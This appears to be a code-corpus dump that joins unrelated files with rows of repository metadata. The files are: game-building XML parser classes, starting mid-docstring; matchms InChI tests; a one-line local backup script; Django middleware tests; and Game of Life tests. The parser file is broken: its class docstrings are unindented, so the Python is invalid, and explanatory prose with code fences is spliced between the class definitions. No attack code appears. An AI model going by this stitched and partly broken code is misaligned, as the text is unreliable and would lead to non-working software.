inactive_amount .Item.InactiveAmount amount of product consumed per minute(?) when the factory is
paused
shutdown_threshold .Item.ShutdownThreshold the factory will be shut down if the workforce fulfillment
rate is less than this threshold
"""
    template_name = "FarmBuilding"

    def parse(self):
        """
        Parse the node; the actual parsers are the parse_node_{tag_name} methods.
        """
        super().parse()
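The derived `amount_per_minute` fields listed in the docstrings come from the per-cycle amounts and the cycle time. A minimal sketch, assuming `FactoryBase.CycleTime` is the cycle length in minutes as the docstring states (the function name is illustrative):

```python
def amount_per_minute(amount_per_cycle, production_time_minutes):
    # Per-minute rate = per-cycle amount divided by cycle length in minutes,
    # assuming CycleTime is expressed in minutes as the docstring suggests.
    return amount_per_cycle / production_time_minutes
```

For example, 2 units per 0.5-minute cycle works out to 4 units per minute.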
class FreeAreaBuilding(Factory):
"""
<Standard>
<GUID>GUID</GUID> *
<Name>Text</Name> *
<IconFilename>Path</IconFilename> *
<InfoDescription>11143</InfoDescription>
</Standard>
<Text .../> *
<Building />
<BuildingType>"Factory"</BuildingType>
<BuildingCategoryName>100000</BuildingCategoryName>
<SkipUnlockMessage>Binary(Default 0)</SkipUnlockMessage>
<BuildModeRandomRotation>Enum(90/180)</BuildModeRandomRotation> *
<AssociatedRegion>List("Moderate";"Colony01")</AssociatedRegion> *
</Building>
<Blocking .../> *
<Cost .../> *
<Object ...> *
<Mesh /> *
<Selection .../> *
<Constructable /> *
<Locked /> *
<SoundEmitter .../> *
<FeedbackController /> *
<Infolayer /> *
<UpgradeList /> *
<RandomDummySpawner /> *
<Factory7 .../> *
<FactoryBase .../> *
<LogisticNode /> *
<AmbientMoodProvider .../> *
<Maintenance .../> *
<Attackable .../> *
<FreeAreaProductivity .../> *
<Pausable /> *
<IncidentInfectable .../> *
<Culture .../> *
<ItemGenerator /> *
id Standard.GUID GUID of the building
name Standard.Name name of the building
text Text.LocaText.English.Text in-game English name of the building
session Building.AssociatedRegion a list of sessions where the building can be built
costs Cost.Costs a list of resources required for building construction
id .Item.Ingredient GUID of the resource
amount .Item.Amount amount of resource needed
needed_fertility Factory7.NeededFertility some factories require a certain island fertility
inputs FactoryBase.FactoryInputs a list of products that the factory consumes
id .Item.Product GUID of product
amount .Item.Amount amount of product consumed per cycle
amount_per_minute amount of product consumed per minute
storage_amount .Item.StorageAmount amount of product that the factory can store
outputs FactoryBase.FactoryOutputs a list of products that the factory produces
id .Item.Product GUID of product
amount .Item.Amount amount of product produced per cycle
amount_per_minute amount of product produced per minute
storage_amount .Item.StorageAmount amount of product that the factory can store
production_time FactoryBase.CycleTime the time of a production cycle (minute)
maintenances Maintenance.Maintenances a list of products that the factory uses for maintenance
id .Item.Product GUID of the product
amount .Item.Amount amount of product consumed per minute(?)
inactive_amount .Item.InactiveAmount amount of product consumed per minute(?) when the factory is
paused
shutdown_threshold .Item.ShutdownThreshold the factory will be shut down if the workforce fulfillment
rate is less than this threshold
"""
    template_name = "FreeAreaBuilding"

    def parse(self):
        """
        Parse the node; the actual parsers are the parse_node_{tag_name} methods.
        """
        super().parse()
class HeavyFreeAreaBuilding(Factory):
"""
<Standard>
<GUID>GUID</GUID> *
<Name>Text</Name> *
<IconFilename>Path</IconFilename> *
<InfoDescription>11143</InfoDescription>
</Standard>
<Text .../> *
<Building />
<BuildingType>"Factory"</BuildingType>
<BuildingCategoryName>100000</BuildingCategoryName>
<BuildModeRandomRotation>Enum(90/180)</BuildModeRandomRotation> *
<AssociatedRegion>List("Moderate";"Colony01")</AssociatedRegion> *
</Building>
<Blocking .../> *
<Cost .../> *
<Object ...> *
<Mesh /> *
<Selection .../> *
<Constructable /> *
<Locked /> *
<SoundEmitter .../> *
<FeedbackController /> *
<Infolayer /> *
<UpgradeList /> *
<RandomDummySpawner /> *
<Factory7 .../> *
<FactoryBase .../> *
<LogisticNode /> *
<AmbientMoodProvider .../> *
<Maintenance .../> *
<Attackable .../> *
<Pausable /> *
<IncidentInfectable .../> *
<Culture .../> *
<IncidentInfluencer .../> *
<FreeAreaProductivity .../> *
<Electric /> *
id Standard.GUID GUID of the building
name Standard.Name name of the building
text Text.LocaText.English.Text in-game English name of the building
session Building.AssociatedRegion a list of sessions where the building can be built
costs Cost.Costs a list of resources required for building construction
id .Item.Ingredient GUID of the resource
amount .Item.Amount amount of resource needed
needed_fertility Factory7.NeededFertility some factories require a certain island fertility
inputs FactoryBase.FactoryInputs a list of products that the factory consumes
id .Item.Product GUID of product
amount .Item.Amount amount of product consumed per cycle
amount_per_minute amount of product consumed per minute
storage_amount .Item.StorageAmount amount of product that the factory can store
outputs FactoryBase.FactoryOutputs a list of products that the factory produces
id .Item.Product GUID of product
amount .Item.Amount amount of product produced per cycle
amount_per_minute amount of product produced per minute
storage_amount .Item.StorageAmount amount of product that the factory can store
production_time FactoryBase.CycleTime the time of a production cycle (minute)
maintenances Maintenance.Maintenances a list of products that the factory uses for maintenance
id .Item.Product GUID of the product
amount .Item.Amount amount of product consumed per minute(?)
inactive_amount .Item.InactiveAmount amount of product consumed per minute(?) when the factory is
paused
shutdown_threshold .Item.ShutdownThreshold the factory will be shut down if the workforce fulfillment
rate is less than this threshold
"""
    template_name = "HeavyFreeAreaBuilding"

    def parse(self):
        """
        Parse the node; the actual parsers are the parse_node_{tag_name} methods.
        """
        super().parse()
class FactoryBuilding(Factory):
"""
<Standard>
<GUID>GUID</GUID> *
<Name>Text</Name> *
<IconFilename>Path</IconFilename> *
<InfoDescription>11143</InfoDescription>
</Standard>
<Text .../> *
<Building />
<BuildingType>"Factory"</BuildingType>
<BuildingCategoryName>100000</BuildingCategoryName>
<TerrainType>Enum("Coast"/"Water")</TerrainType>
<SkipUnlockMessage>Binary(Default 0)</SkipUnlockMessage>
<BuildModeRandomRotation>Enum(90/180)</BuildModeRandomRotation> *
<AssociatedRegion>List("Moderate";"Colony01")</AssociatedRegion> *
</Building>
<Blocking .../> *
<Cost .../> *
<Object ...> *
<Mesh /> *
<Selection .../> *
<Constructable /> *
<Locked /> *
<SoundEmitter .../> *
<FeedbackController /> *
<Infolayer /> *
<UpgradeList /> *
<RandomDummySpawner /> *
<Factory7 .../> *
<FactoryBase .../> *
<LogisticNode /> *
<AmbientMoodProvider .../> *
<Maintenance .../> *
<Attackable .../> *
<Pausable /> *
<IncidentInfectable .../> *
<Electric /> *
<Culture .../> *
<ItemGenerator /> *
<QuestObject /> *
id Standard.GUID GUID of the building
name Standard.Name name of the building
text Text.LocaText.English.Text in-game English name of the building
session Building.AssociatedRegion a list of sessions where the building can be built
costs Cost.Costs a list of resources required for building construction
id .Item.Ingredient GUID of the resource
amount .Item.Amount amount of resource needed
needed_fertility Factory7.NeededFertility some factories require a certain island fertility
inputs FactoryBase.FactoryInputs a list of products that the factory consumes
id .Item.Product GUID of product
amount .Item.Amount amount of product consumed per cycle
amount_per_minute amount of product consumed per minute
storage_amount .Item.StorageAmount amount of product that the factory can store
outputs FactoryBase.FactoryOutputs a list of products that the factory produces
id .Item.Product GUID of product
amount .Item.Amount amount of product produced per cycle
amount_per_minute amount of product produced per minute
storage_amount .Item.StorageAmount amount of product that the factory can store
production_time FactoryBase.CycleTime the time of a production cycle (minute)
maintenances Maintenance.Maintenances a list of products that the factory uses for maintenance
id .Item.Product GUID of the product
amount .Item.Amount amount of product consumed per minute(?)
inactive_amount .Item.InactiveAmount amount of product consumed per minute(?) when the factory is
paused
shutdown_threshold .Item.ShutdownThreshold the factory will be shut down if the workforce fulfillment
rate is less than this threshold
"""
    template_name = "FactoryBuilding7"

    def parse(self):
        """
        Parse the node; the actual parsers are the parse_node_{tag_name} methods.
        """
        super().parse()
class HeavyFactoryBuilding(Factory):
"""
<Standard>
<GUID>GUID</GUID> *
<Name>Text</Name> *
<IconFilename>Path</IconFilename> *
<InfoDescription>11143</InfoDescription>
</Standard>
<Text .../> *
<Building />
<BuildingType>"Factory"</BuildingType>
<BuildingCategoryName>100000</BuildingCategoryName>
<TerrainType>Enum("Coast"/"Water")</TerrainType>
<SkipUnlockMessage>Binary(Default 0)</SkipUnlockMessage>
<BuildModeRandomRotation>Enum(90/180)</BuildModeRandomRotation> *
<AssociatedRegion>List("Moderate";"Colony01")</AssociatedRegion> *
</Building>
<Blocking .../> *
<Cost .../> *
<Object ...> *
<Mesh /> *
<Selection .../> *
<Constructable /> *
<Locked /> *
<SoundEmitter .../> *
<FeedbackController /> *
<Infolayer /> *
<UpgradeList /> *
<RandomDummySpawner /> *
<Factory7 .../> *
<FactoryBase .../> *
<LogisticNode /> *
<AmbientMoodProvider .../> *
<Maintenance .../> *
<Attackable .../> *
<Pausable /> *
<IncidentInfectable .../> *
<Culture .../> *
<IncidentInfluencer .../> *
<Electric /> *
<ItemGenerator /> *
<QuestObject /> *
id Standard.GUID GUID of the building
name Standard.Name name of the building
text Text.LocaText.English.Text in-game English name of the building
session Building.AssociatedRegion a list of sessions where the building can be built
costs Cost.Costs a list of resources required for building construction
id .Item.Ingredient GUID of the resource
amount .Item.Amount amount of resource needed
needed_fertility Factory7.NeededFertility some factories require a certain island fertility
inputs FactoryBase.FactoryInputs a list of products that the factory consumes
id .Item.Product GUID of product
amount .Item.Amount amount of product consumed per cycle
amount_per_minute amount of product consumed per minute
storage_amount .Item.StorageAmount amount of product that the factory can store
outputs FactoryBase.FactoryOutputs a list of products that the factory produces
id .Item.Product GUID of product
amount .Item.Amount amount of product produced per cycle
amount_per_minute amount of product produced per minute
storage_amount .Item.StorageAmount amount of product that the factory can store
production_time FactoryBase.CycleTime the time of a production cycle (minute)
maintenances Maintenance.Maintenances a list of products that the factory uses for maintenance
id .Item.Product GUID of the product
amount .Item.Amount amount of product consumed per minute(?)
inactive_amount .Item.InactiveAmount amount of product consumed per minute(?) when the factory is
paused
shutdown_threshold .Item.ShutdownThreshold the factory will be shut down if the workforce fulfillment
rate is less than this threshold
"""
    template_name = "HeavyFactoryBuilding"

    def parse(self):
        """
        Parse the node; the actual parsers are the parse_node_{tag_name} methods.
        """
        super().parse()
class SlotFactoryBuilding(Factory):
"""
<Standard>
<GUID>GUID</GUID> *
<Name>Text</Name> *
<IconFilename>Path</IconFilename> *
<InfoDescription>11143</InfoDescription>
</Standard>
<Text .../> *
<Building />
<BuildingType>"Factory"</BuildingType>
<BuildingCategoryName>100000</BuildingCategoryName>
<SkipUnlockMessage>Binary(Default 0)</SkipUnlockMessage>
<BuildModeRandomRotation>Enum(90/180)</BuildModeRandomRotation> *
<AssociatedRegion>List("Moderate";"Colony01")</AssociatedRegion> *
</Building>
<Blocking .../> *
<Cost .../> *
<Object ...> *
<Mesh /> *
<Selection .../> *
<Constructable /> *
<Locked /> *
<SoundEmitter .../> *
<FeedbackController /> *
<Infolayer /> *
<UpgradeList /> *
<RandomDummySpawner /> *
<Factory7 .../> *
<FactoryBase .../> *
<LogisticNode /> *
<Slot /> *
<AmbientMoodProvider .../> *
<Maintenance .../> *
<Attackable .../> *
<Pausable /> *
<IncidentInfectable .../> *
<Culture .../> *
<Electric /> *
id Standard.GUID GUID of the building
name Standard.Name name of the building
text Text.LocaText.English.Text in-game English name of the building
session Building.AssociatedRegion a list of sessions where the building can be built
costs Cost.Costs a list of resources required for building construction
id .Item.Ingredient GUID of the resource
amount .Item.Amount amount of resource needed
needed_fertility Factory7.NeededFertility some factories require a certain island fertility
inputs FactoryBase.FactoryInputs a list of products that the factory consumes
id .Item.Product GUID of product
amount .Item.Amount amount of product consumed per cycle
amount_per_minute amount of product consumed per minute
storage_amount .Item.StorageAmount amount of product that the factory can store
outputs FactoryBase.FactoryOutputs a list of products that the factory produces
id .Item.Product GUID of product
amount .Item.Amount amount of product produced per cycle
amount_per_minute amount of product produced per minute
storage_amount .Item.StorageAmount amount of product that the factory can store
production_time FactoryBase.CycleTime the time of a production cycle (minute)
maintenances Maintenance.Maintenances a list of products that the factory uses for maintenance
id .Item.Product GUID of the product
amount .Item.Amount amount of product consumed per minute(?)
inactive_amount .Item.InactiveAmount amount of product consumed per minute(?) when the factory is
paused
shutdown_threshold .Item.ShutdownThreshold the factory will be shut down if the workforce fulfillment
rate is less than this threshold
"""
    template_name = "SlotFactoryBuilding7"

    def parse(self):
        """
        Parse the node; the actual parsers are the parse_node_{tag_name} methods.
        """
        super().parse()
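Each of these subclasses only sets `template_name` and defers to `super().parse()`, which suggests the classes are selected through a lookup keyed on the template name. The excerpt does not show the project's actual dispatch mechanism; the registry below is a hedged sketch of that common pattern, with illustrative names:

```python
TEMPLATE_CLASSES = {}

def register(cls):
    # Class decorator: index parser classes by their template_name attribute.
    TEMPLATE_CLASSES[cls.template_name] = cls
    return cls

@register
class FarmBuildingParser:
    template_name = "FarmBuilding"

def parser_for(template_name):
    # Select the parser class for an XML template; raises KeyError if unknown.
    return TEMPLATE_CLASSES[template_name]
```

With every template class decorated this way, a driver can look up the right parser from the `<Template><Name>` value of each XML asset.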
| 48.444444 | 121 | 0.554472 | 3,104 | 36,624 | 6.495168 | 0.082474 | 0.038837 | 0.051337 | 0.038788 | 0.786717 | 0.77268 | 0.767521 | 0.75899 | 0.753931 | 0.753931 | 0 | 0.011531 | 0.367792 | 36,624 | 755 | 122 | 48.508609 | 0.859204 | 0.80663 | 0 | 0.217949 | 0 | 0 | 0.107132 | 0.006215 | 0 | 0 | 0 | 0.031788 | 0 | 1 | 0.141026 | false | 0 | 0.038462 | 0 | 0.346154 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
fa2069dadf178b6afe01e7f3454292c540efb4b3 | 2,192 | py | Python | tests/test_harmonize_undefined_inchi.py | efrain2010/matchms | 69cedeed5597966619a97c4e4211deaf8610d727 | [
"Apache-2.0"
] | null | null | null | tests/test_harmonize_undefined_inchi.py | efrain2010/matchms | 69cedeed5597966619a97c4e4211deaf8610d727 | [
"Apache-2.0"
] | 23 | 2020-03-16T13:47:00.000Z | 2020-03-19T13:34:27.000Z | tests/test_harmonize_undefined_inchi.py | efrain2010/matchms | 69cedeed5597966619a97c4e4211deaf8610d727 | [
"Apache-2.0"
] | null | null | null | import numpy
from matchms import Spectrum
from matchms.filtering import harmonize_undefined_inchi
def test_harmonize_undefined_inchi_empty_string():
    spectrum_in = Spectrum(mz=numpy.array([], dtype="float"),
                           intensities=numpy.array([], dtype="float"),
                           metadata={"inchi": ""})

    spectrum = harmonize_undefined_inchi(spectrum_in)

    assert spectrum.get("inchi") == ""


def test_harmonize_undefined_inchi_na_1():
    spectrum_in = Spectrum(mz=numpy.array([], dtype="float"),
                           intensities=numpy.array([], dtype="float"),
                           metadata={"inchi": "n/a"})

    spectrum = harmonize_undefined_inchi(spectrum_in)

    assert spectrum.get("inchi") == ""


def test_harmonize_undefined_inchi_na_2():
    spectrum_in = Spectrum(mz=numpy.array([], dtype="float"),
                           intensities=numpy.array([], dtype="float"),
                           metadata={"inchi": "N/A"})

    spectrum = harmonize_undefined_inchi(spectrum_in)

    assert spectrum.get("inchi") == ""


def test_harmonize_undefined_inchi_na_3():
    spectrum_in = Spectrum(mz=numpy.array([], dtype="float"),
                           intensities=numpy.array([], dtype="float"),
                           metadata={"inchi": "NA"})

    spectrum = harmonize_undefined_inchi(spectrum_in)

    assert spectrum.get("inchi") == ""


def test_harmonize_undefined_inchi_alias_nan():
    spectrum_in = Spectrum(mz=numpy.array([], dtype="float"),
                           intensities=numpy.array([], dtype="float"),
                           metadata={"inchi": "nan"})

    spectrum = harmonize_undefined_inchi(spectrum_in, aliases=["nodata", "NaN", "Nan", "nan"])

    assert spectrum.get("inchi") == ""


def test_harmonize_undefined_inchi_alias_nan_undefined_is_na():
    spectrum_in = Spectrum(mz=numpy.array([], dtype="float"),
                           intensities=numpy.array([], dtype="float"),
                           metadata={"inchi": "nan"})

    spectrum = harmonize_undefined_inchi(spectrum_in, aliases=["nodata", "NaN", "Nan", "nan"], undefined="n/a")

    assert spectrum.get("inchi") == "n/a"
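The behaviour these tests pin down — mapping empty or placeholder `inchi` values to a configurable `undefined` marker — can be sketched with a plain dict in place of matchms's `Spectrum`. This is an illustration of the contract, not the library's implementation:

```python
def harmonize_undefined(metadata, key="inchi",
                        aliases=("n/a", "N/A", "NA"), undefined=""):
    """Replace placeholder values for `key` with the `undefined` marker.

    A dict-based sketch of the contract the tests above exercise;
    matchms's real filter operates on Spectrum objects, not dicts.
    """
    value = metadata.get(key)
    if value is not None and (value == "" or value in aliases):
        metadata = {**metadata, key: undefined}
    return metadata
```

As in the tests, "nan" is only harmonized when passed explicitly via `aliases`, and `undefined` controls what the placeholder is replaced with.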
| 34.25 | 111 | 0.604015 | 230 | 2,192 | 5.5 | 0.143478 | 0.18498 | 0.236364 | 0.189723 | 0.886166 | 0.886166 | 0.858498 | 0.858498 | 0.858498 | 0.858498 | 0 | 0.001817 | 0.246807 | 2,192 | 63 | 112 | 34.793651 | 0.764385 | 0 | 0 | 0.589744 | 0 | 0 | 0.077555 | 0 | 0 | 0 | 0 | 0 | 0.153846 | 1 | 0.153846 | false | 0 | 0.076923 | 0 | 0.230769 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
fa6d2e9b35e57f7715152260b274fe7ea3613212 | 140 | py | Python | backup-svo.py | hyperlogic/shock | c65419c7fe13b2b7f68d0c8804185c94bdb1bbad | [
"Apache-2.0"
] | null | null | null | backup-svo.py | hyperlogic/shock | c65419c7fe13b2b7f68d0c8804185c94bdb1bbad | [
"Apache-2.0"
] | null | null | null | backup-svo.py | hyperlogic/shock | c65419c7fe13b2b7f68d0c8804185c94bdb1bbad | [
"Apache-2.0"
] | 1 | 2020-09-03T21:19:34.000Z | 2020-09-03T21:19:34.000Z | import subprocess
subprocess.call(["cp", "c:/Users/anthony/AppData/Roaming/High Fidelity/assignment-client/entities/models.json.gz", "."])
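Shelling out to `cp` is not portable — the path above is a Windows profile, where `cp` is usually unavailable. The stdlib `shutil` module performs the same copy on any platform; a sketch (the `backup` wrapper is illustrative, keeping the hard-coded path as an argument):

```python
import shutil

def backup(src, dest_dir="."):
    # Portable equivalent of `cp <src> <dest_dir>`; returns the destination path.
    return shutil.copy(src, dest_dir)
```

Calling `backup("c:/Users/anthony/AppData/Roaming/High Fidelity/assignment-client/entities/models.json.gz")` would mirror the `subprocess.call` above.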
| 35 | 120 | 0.764286 | 18 | 140 | 5.944444 | 0.944444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.05 | 140 | 3 | 121 | 46.666667 | 0.804511 | 0 | 0 | 0 | 0 | 0.5 | 0.65 | 0.621429 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
d75c00156d7db1f7d078d319140f877e220a4755 | 8,076 | py | Python | tests/test_django_httpresponse.py | fearsd/django-logging-middleware | 6eb95774c1bcb1829aa1a94223d9e2c39217d8f9 | [
"MIT"
] | 4 | 2021-04-08T14:14:04.000Z | 2021-09-08T07:57:38.000Z | tests/test_django_httpresponse.py | fearsd/django-logging-middleware | 6eb95774c1bcb1829aa1a94223d9e2c39217d8f9 | [
"MIT"
] | null | null | null | tests/test_django_httpresponse.py | fearsd/django-logging-middleware | 6eb95774c1bcb1829aa1a94223d9e2c39217d8f9 | [
"MIT"
] | null | null | null | import pytest
from django.test import TestCase, override_settings
from .utils import MIDDLEWARES_FOR_TESTING
class TestHttpResponseFunctionWithoutUserMiddleware(TestCase):
    def test_middleware_simple_get_request(self):
        try:
            self.client.get('/simple/')
        except Exception as e:
            pytest.fail(f"Error: {e}")

    def test_middleware_simple_post_request(self):
        try:
            self.client.post('/simple/', data={'data': 'data'}, content_type='application/json')
        except Exception as e:
            pytest.fail(f"Error: {e}")

    def test_middleware_simple_put_request(self):
        try:
            self.client.put('/simple/', data={'data': 'data'}, content_type='application/json')
        except Exception as e:
            pytest.fail(f"Error: {e}")

    def test_middleware_simple_delete_request(self):
        try:
            self.client.delete('/simple/')
        except Exception as e:
            pytest.fail(f"Error: {e}")

    def test_middleware_simple_get_with_query_string_request(self):
        try:
            self.client.get('/simple_with_query_string/', {'data': 'data'})
        except Exception as e:
            pytest.fail(f"Error: {e}")

    def test_middleware_simple_post_with_query_string_request(self):
        try:
            self.client.post('/simple_with_query_string/?data=data', data={'data_json': 'data_json'}, content_type='application/json')
        except Exception as e:
            pytest.fail(f"Error: {e}")

    def test_middleware_simple_put_with_query_string_request(self):
        try:
            self.client.put('/simple_with_query_string/?data=data', data={'data_json': 'data_json'}, content_type='application/json')
        except Exception as e:
            pytest.fail(f"Error: {e}")

    def test_middleware_simple_delete_with_query_string_request(self):
        try:
            self.client.delete('/simple_with_query_string/', {'data': 'data'})
        except Exception as e:
            pytest.fail(f"Error: {e}")


@override_settings(MIDDLEWARE=MIDDLEWARES_FOR_TESTING)
class TestHttpResponseFunctionWithUserMiddleware(TestCase):
    def test_middleware_simple_get_request(self):
        try:
            self.client.get('/simple/')
        except Exception as e:
            pytest.fail(f"Error: {e}")

    def test_middleware_simple_post_request(self):
        try:
            self.client.post('/simple/', data={'data': 'data'}, content_type='application/json')
        except Exception as e:
            pytest.fail(f"Error: {e}")

    def test_middleware_simple_put_request(self):
        try:
            self.client.put('/simple/', data={'data': 'data'}, content_type='application/json')
        except Exception as e:
            pytest.fail(f"Error: {e}")

    def test_middleware_simple_delete_request(self):
        try:
            self.client.delete('/simple/')
        except Exception as e:
            pytest.fail(f"Error: {e}")

    def test_middleware_simple_get_with_query_string_request(self):
        try:
            self.client.get('/simple_with_query_string/', {'data': 'data'})
        except Exception as e:
            pytest.fail(f"Error: {e}")

    def test_middleware_simple_post_with_query_string_request(self):
        try:
            self.client.post('/simple_with_query_string/?data=data', data={'data_json': 'data_json'}, content_type='application/json')
        except Exception as e:
            pytest.fail(f"Error: {e}")

    def test_middleware_simple_put_with_query_string_request(self):
        try:
            self.client.put('/simple_with_query_string/?data=data', data={'data_json': 'data_json'}, content_type='application/json')
        except Exception as e:
            pytest.fail(f"Error: {e}")

    def test_middleware_simple_delete_with_query_string_request(self):
        try:
            self.client.delete('/simple_with_query_string/', {'data': 'data'})
        except Exception as e:
            pytest.fail(f"Error: {e}")


class TestHttpResponseClassWithoutUserMiddleware(TestCase):
    def test_middleware_simple_get_request(self):
        try:
            self.client.get('/simple/class/')
        except Exception as e:
            pytest.fail(f"Error: {e}")

    def test_middleware_simple_post_request(self):
        try:
            self.client.post('/simple/class/', data={'data': 'data'}, content_type='application/json')
        except Exception as e:
            pytest.fail(f"Error: {e}")

    def test_middleware_simple_put_request(self):
        try:
            self.client.put('/simple/class/', data={'data': 'data'}, content_type='application/json')
        except Exception as e:
            pytest.fail(f"Error: {e}")

    def test_middleware_simple_delete_request(self):
        try:
            self.client.delete('/simple/class/')
        except Exception as e:
            pytest.fail(f"Error: {e}")

    def test_middleware_simple_get_with_query_string_request(self):
        try:
            self.client.get('/simple/class/with_query_string/', {'data': 'data'})
        except Exception as e:
            pytest.fail(f"Error: {e}")

    def test_middleware_simple_post_with_query_string_request(self):
        try:
            self.client.post('/simple/class/with_query_string/?data=data', data={'data_json': 'data_json'}, content_type='application/json')
        except Exception as e:
            pytest.fail(f"Error: {e}")

    def test_middleware_simple_put_with_query_string_request(self):
        try:
            self.client.put('/simple/class/with_query_string/?data=data', data={'data_json': 'data_json'}, content_type='application/json')
        except Exception as e:
            pytest.fail(f"Error: {e}")

    def test_middleware_simple_delete_with_query_string_request(self):
        try:
            self.client.delete('/simple/class/with_query_string/', {'data': 'data'})
        except Exception as e:
            pytest.fail(f"Error: {e}")


@override_settings(MIDDLEWARE=MIDDLEWARES_FOR_TESTING)
class TestHttpResponseClassWithUserMiddleware(TestCase):
    def test_middleware_simple_get_request(self):
        try:
            self.client.get('/simple/class/')
        except Exception as e:
            pytest.fail(f"Error: {e}")

    def test_middleware_simple_post_request(self):
        try:
            self.client.post('/simple/class/', data={'data': 'data'}, content_type='application/json')
        except Exception as e:
            pytest.fail(f"Error: {e}")

    def test_middleware_simple_put_request(self):
        try:
            self.client.put('/simple/class/', data={'data': 'data'}, content_type='application/json')
        except Exception as e:
            pytest.fail(f"Error: {e}")

    def test_middleware_simple_delete_request(self):
        try:
            self.client.delete('/simple/class/')
        except Exception as e:
            pytest.fail(f"Error: {e}")

    def test_middleware_simple_get_with_query_string_request(self):
        try:
            self.client.get('/simple/class/with_query_string/', {'data': 'data'})
        except Exception as e:
            pytest.fail(f"Error: {e}")

    def test_middleware_simple_post_with_query_string_request(self):
        try:
            self.client.post('/simple/class/with_query_string/?data=data', data={'data_json': 'data_json'}, content_type='application/json')
        except Exception as e:
            pytest.fail(f"Error: {e}")

    def test_middleware_simple_put_with_query_string_request(self):
        try:
            self.client.put('/simple/class/with_query_string/?data=data', data={'data_json': 'data_json'}, content_type='application/json')
        except Exception as e:
            pytest.fail(f"Error: {e}")

    def test_middleware_simple_delete_with_query_string_request(self):
        try:
            self.client.delete('/simple/class/with_query_string/', {'data': 'data'})
        except Exception as e:
            pytest.fail(f"Error: {e}")
ad777522cf6148adfb4b6267fd279c9591878812 | 5,309 | py | Python | game-of-life-kata/test/test_grid linebuffer.py | Kartones/PythonAssorted | 0351b176f45aab886965056bebd951d29f5b99fb | [
"Unlicense"
] | 12 | 2016-12-27T19:41:46.000Z | 2020-06-02T19:14:26.000Z | game-of-life-kata/test/test_grid linebuffer.py | Kartones/PythonAssorted | 0351b176f45aab886965056bebd951d29f5b99fb | [
"Unlicense"
] | 1 | 2020-08-18T20:58:29.000Z | 2020-08-19T05:31:40.000Z | game-of-life-kata/test/test_grid linebuffer.py | Kartones/PythonAssorted | 0351b176f45aab886965056bebd951d29f5b99fb | [
"Unlicense"
] | 2 | 2020-08-18T20:23:59.000Z | 2021-08-01T13:35:02.000Z | from grid_linebuffer import Grid
"""
Game of Life kata (inside out approach)
"""
# grid setup
def test_setups_an_NxM_grid_with_width_N_4_and_height_M_3():
grid = Grid(width=4, height=3)
assert len(grid.matrix) == 3*4
def test_setups_an_square_3x3_grid():
grid = Grid(width=3, height=3)
assert len(grid.matrix) == 3*3
def test_creates_a_new_grid_filled_with_empty_cells():
grid = Grid(width=3, height=3)
for cell in grid.matrix:
assert cell == 0
# populating cells
def test_on_a_1x1_grid_populates_the_position():
grid = Grid(width=1, height=1)
assert grid.get_cell(0, 0) == 0
grid.populate_cells([(0, 0)])
assert grid.get_cell(0, 0) == 1
def test_on_a_2x2_grid_populates_some_positions():
grid = Grid(width=2, height=2)
grid.populate_cells([(0, 1), (1, 1)])
assert grid.get_cell(0, 0) == 0
assert grid.get_cell(0, 1) == 1
assert grid.get_cell(1, 0) == 0
assert grid.get_cell(1, 1) == 1
# invididual cell evolution calculations
def test_on_a_1x1_grid_evolution_calculations_dont_error():
grid = Grid(width=1, height=1)
grid.advance_generation()
assert grid.get_cell(0, 0) == 0
def test_on_a_2x2_grid_evolution_calculations_dont_error():
grid = Grid(width=2, height=2)
grid.populate_cells([(0, 1)])
grid.advance_generation()
assert grid.get_cell(0, 1) == 0
def test_on_a_3x3_grid_a_centered_cell_survives_if_has_2_adjacent_cells():
grid = Grid(width=3, height=3)
grid.populate_cells([(1, 1), (0, 1), (1, 2)])
grid.advance_generation()
assert grid.get_cell(1, 1) == 1
def test_on_a_3x3_grid_a_centered_cell_survives_if_has_3_adjacent_cells():
grid = Grid(width=3, height=3)
grid.populate_cells([(1, 1), (0, 1), (1, 2), (2, 2)])
grid.advance_generation()
assert grid.get_cell(1, 1) == 1
def test_on_a_3x3_grid_a_centered_cell_dies_if_has_no_adjacent_cells():
grid = Grid(width=3, height=3)
grid.populate_cells([(1, 1)])
grid.advance_generation()
assert grid.get_cell(1, 1) == 0
def test_on_a_3x3_grid_a_centered_cell_dies_if_has_less_than_2_adjacent_cells():
grid = Grid(width=3, height=3)
grid.populate_cells([(1, 1), (2, 2)])
grid.advance_generation()
assert grid.get_cell(1, 1) == 0
def test_on_a_3x3_grid_a_centered_cell_dies_if_has_more_than_3_adjacent_cells():
grid = Grid(width=3, height=3)
grid.populate_cells([(1, 0), (1, 1), (2, 0), (2, 1), (2, 2)])
grid.advance_generation()
assert grid.get_cell(1, 1) == 0
def test_on_a_3x3_grid_a_centered_cell_space_reproduces_if_has_exactly_3_adjacent_cells():
grid = Grid(width=3, height=3)
grid.populate_cells([(0, 1), (1, 2), (2, 2)])
grid.advance_generation()
assert grid.get_cell(1, 1) == 1
def test_on_a_3x3_grid_a_centered_cell_space_doesnt_reproduces_if_has_less_than_3_adjacent_cells():
grid = Grid(width=3, height=3)
grid.populate_cells([(0, 1), (1, 2)])
grid.advance_generation()
assert grid.get_cell(1, 1) == 0
def test_on_a_3x3_grid_a_centered_cell_space_doesnt_reproduces_if_has_more_than_3_adjacent_cells():
grid = Grid(width=3, height=3)
grid.populate_cells([(0, 1), (1, 2), (2, 1), (2, 2)])
grid.advance_generation()
assert grid.get_cell(1, 1) == 0
